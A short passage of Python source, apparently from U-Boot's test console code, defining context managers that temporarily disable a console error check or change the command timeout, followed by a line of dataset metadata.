assert(self.u_boot_version_string in text)
def disable_check(self, check_type):
"""Temporarily disable an error check of U-Boot's output.
Create a new context manager (for use with the "with" statement) which
temporarily disables a particular console output error check.
Args:
check_type: The type of error-check to disable. Valid values may
be found in self.disable_check_count above.
Returns:
A context manager object.
"""
return ConsoleDisableCheck(self, check_type)
def temporary_timeout(self, timeout):
"""Temporarily set up different timeout for commands.
Create a new context manager (for use with the "with" statement) which
temporarily change timeout.
Args:
timeout: Time in milliseconds.
Returns:
A context manager object.
"""
return ConsoleSetupTimeout(self, timeout)
| gpl-2.0 | -670,844,553,990,822,100 | 35.662281 | 85 | 0.586374 | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.